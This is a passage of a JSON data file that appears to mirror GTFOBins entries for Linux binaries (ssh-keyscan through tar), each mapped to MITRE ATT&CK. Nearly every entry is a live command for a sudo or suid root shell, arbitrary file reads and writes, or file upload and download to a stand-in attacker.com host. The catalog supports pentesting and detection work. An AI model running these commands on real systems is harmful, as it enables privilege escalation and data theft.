Read"],"nativeCategory":["file-read"],"command":"ssh-keyscan -f /path/to/input-file","description":"The file content is actually parsed so only a part of each line is returned as a part of an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ssh-keyscan/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:command:0:sudo","toolId":"gtfo:sshfs","toolName":"sshfs","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sshfs -o ssh_command=/path/to/command x: /path/to/dir/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:command:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"sshfs -o ssh_command=/path/to/command x: /path/to/dir/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:download:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/dir/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:shell:0:sudo","toolId":"gtfo:sshfs","toolName":"sshfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/","description":"The mount dir must be writable by the invoking user.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:shell:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e '/bin/sh </dev/tty >/dev/tty 2>/dev/tty' >/path/to/temp-file\nchmod +x /path/to/temp-file\nsshfs -o ssh_command=/path/to/temp-file x: /path/to/dir/","description":"The mount dir must be writable by the invoking user.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshfs:upload:0:unprivileged","toolId":"gtfo:sshfs","toolName":"sshfs","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"sshfs user@attacker.com:/ /path/to/dir/\ncp /path/to/input-file /path/to/dir/","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshfs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshpass:shell:0:sudo","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sshpass /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshpass/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshpass:shell:0:suid","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sshpass /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sshpass/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshpass:shell:0:unprivileged","toolId":"gtfo:sshpass","toolName":"sshpass","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sshpass /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sshpass/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sshuttle:shell:0:sudo","toolId":"gtfo:sshuttle","toolName":"sshuttle","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sudo sshuttle -r x --ssh-cmd '/bin/sh -c \"/bin/sh 0<&2 1>&2\"' localhost","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sshuttle/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:start-stop-daemon:shell:0:sudo","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:start-stop-daemon:shell:0:suid","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh -- -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:start-stop-daemon:shell:0:unprivileged","toolId":"gtfo:start-stop-daemon","toolName":"start-stop-daemon","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"start-stop-daemon -S -x /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/start-stop-daemon/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:stdbuf:shell:0:sudo","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:stdbuf:shell:0:suid","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:stdbuf:shell:0:unprivileged","toolId":"gtfo:stdbuf","toolName":"stdbuf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"stdbuf -i0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/stdbuf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:file-write:0:sudo","toolId":"gtfo:strace","toolName":"strace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"strace -s 999 -o /path/to/output-file strace - DATA","description":"The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:file-write:0:unprivileged","toolId":"gtfo:strace","toolName":"strace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"strace -s 999 -o /path/to/output-file strace - DATA","description":"The data to be written appears amid the syscall log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever syscall passing arbitrary data can be used in place of `strace - DATA`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:shell:0:sudo","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:shell:0:suid","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strace:shell:0:unprivileged","toolId":"gtfo:strace","toolName":"strace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"strace -o /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strings:file-read:0:sudo","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/strings/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strings:file-read:0:suid","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/strings/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:strings:file-read:0:unprivileged","toolId":"gtfo:strings","toolName":"strings","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"strings /path/to/input-file","description":"This only returns ASCII strings.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/strings/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:su:shell:0:sudo","toolId":"gtfo:su","toolName":"su","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"su -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/su/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sudo:shell:0:sudo","toolId":"gtfo:sudo","toolName":"sudo","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sudo /bin/sh","description":"The invocation is actually `sudo sudo ...`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sudo/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:command:0:sudo","toolId":"gtfo:sysctl","toolName":"sysctl","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sysctl 'kernel.core_pattern=|/path/to/command'","description":"The command is executed by `root` in the background when a core dump occurs.\n\nTo trigger a core dump, send the `SIGQUIT` signal to a process, for example:\n\n```\nsleep infinity &\nkill -QUIT $!\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:command:0:suid","toolId":"gtfo:sysctl","toolName":"sysctl","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"sysctl 'kernel.core_pattern=|/path/to/command'","description":"The command is executed by `root` in the background when a core dump occurs.\n\nTo trigger a core dump, send the `SIGQUIT` signal to a process, for example:\n\n```\nsleep infinity &\nkill -QUIT $!\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:file-read:0:sudo","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:file-read:0:suid","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:sysctl:file-read:0:unprivileged","toolId":"gtfo:sysctl","toolName":"sysctl","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sysctl -n \"/../../path/to/input-file\"","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sysctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:inherit:0:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:inherit:0:suid","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:inherit:0:unprivileged","toolId":"gtfo:systemctl","toolName":"systemctl","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"systemctl","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:shell:0:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[Service]\nType=oneshot\nExecStart=/path/to/command\n[Install]\nWantedBy=multi-user.target' >/path/to/temp-file.service\nsystemctl link /path/to/temp-file.service\nsystemctl enable --now /path/to/temp-file.service","description":"It might happen that the service is not started with `--now`, in such cases it might be necessary to manually start it.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:shell:0:suid","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '[Service]\nType=oneshot\nExecStart=/path/to/command\n[Install]\nWantedBy=multi-user.target' >/path/to/temp-file.service\nsystemctl link /path/to/temp-file.service\nsystemctl enable --now /path/to/temp-file.service","description":"It might happen that the service is not started with `--now`, in such cases it might be necessary to manually start it.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemctl:shell:1:sudo","toolId":"gtfo:systemctl","toolName":"systemctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\nSYSTEMD_EDITOR=/path/to/temp-file systemctl edit basic.target","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemd-resolve:inherit:0:sudo","toolId":"gtfo:systemd-resolve","toolName":"systemd-resolve","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"systemd-resolve --status","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-resolve/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemd-run:command:0:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"systemd-run /path/to/command","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemd-run:shell:0:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"systemd-run -S","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:systemd-run:shell:1:sudo","toolId":"gtfo:systemd-run","toolName":"systemd-run","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"systemd-run -t /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/systemd-run/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tac:file-read:0:sudo","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tac/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tac:file-read:0:suid","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tac/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tac:file-read:0:unprivileged","toolId":"gtfo:tac","toolName":"tac","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tac -s 'RANDOM' /path/to/input-file","description":"Make sure that `RANDOM` does not appear into the file to read otherwise the content of the file is corrupted by reversing the order of `RANDOM`-separated chunks.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tac/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tail:file-read:0:sudo","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tail:file-read:0:suid","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tail:file-read:0:unprivileged","toolId":"gtfo:tail","toolName":"tail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tail -c+0 /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tailscale:upload:0:sudo","toolId":"gtfo:tailscale","toolName":"tailscale","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"tailscale serve --http=12345 /path/to/input-file","description":"The URL is reachable by any host of the same Tailnet.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tailscale/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:download:0:sudo","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:download:0:suid","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:tar:download:0:unprivileged","toolId":"gtfo:tar","toolName":"tar","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh","description":"The attacker box must have the `rmt` utility installed.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tar/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 